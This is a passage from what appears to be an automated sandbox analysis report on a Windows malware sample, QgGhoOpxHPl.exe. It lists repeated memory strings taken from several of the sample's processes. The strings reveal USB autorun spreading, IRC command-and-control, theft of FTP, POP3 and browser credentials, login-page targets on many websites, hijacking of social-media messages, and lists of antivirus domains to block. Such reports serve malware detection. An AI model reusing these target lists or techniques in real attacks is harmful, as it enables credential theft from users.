'%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 0000001D.00000002.621517532.00000000005D0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 0000001D.00000002.621517532.00000000005D0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exeBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exeBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exeBinary or memory string: autorun.inf
            Source: QgGhoOpxHPl.exe, 0000001E.00000002.620410172.0000000000090000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 0000001E.00000002.620410172.0000000000090000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 0000001E.00000002.620410172.0000000000090000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL '%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 0000001E.00000002.620410172.0000000000090000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 0000001E.00000002.620410172.0000000000090000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exeBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exeBinary or memory string: autorun.inf
            Source: QgGhoOpxHPl.exeBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 0000001F.00000002.622442633.0000000000910000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 0000001F.00000002.622442633.0000000000910000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 0000001F.00000002.622442633.0000000000910000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL '%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 0000001F.00000002.622442633.0000000000910000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 0000001F.00000002.622442633.0000000000910000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exeBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exeBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exeBinary or memory string: autorun.inf
            Source: QgGhoOpxHPl.exe, 00000020.00000002.621089259.0000000000390000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 00000020.00000002.621089259.0000000000390000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 00000020.00000002.621089259.0000000000390000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL '%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 00000020.00000002.621089259.0000000000390000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 00000020.00000002.621089259.0000000000390000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exeBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exeBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exeBinary or memory string: autorun.inf
            Source: QgGhoOpxHPl.exe, 00000021.00000002.620364062.0000000000090000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 00000021.00000002.620364062.0000000000090000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 00000021.00000002.620364062.0000000000090000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL '%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 00000021.00000002.620364062.0000000000090000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 00000021.00000002.620364062.0000000000090000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exeBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exeBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exeBinary or memory string: autorun.inf
            Source: QgGhoOpxHPl.exe, 00000022.00000002.620590554.0000000000220000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 00000022.00000002.620590554.0000000000220000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 00000022.00000002.620590554.0000000000220000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL '%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 00000022.00000002.620590554.0000000000220000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 00000022.00000002.620590554.0000000000220000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exeBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exeBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exeBinary or memory string: autorun.inf
            Source: QgGhoOpxHPl.exe, 00000023.00000002.620504431.0000000000150000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
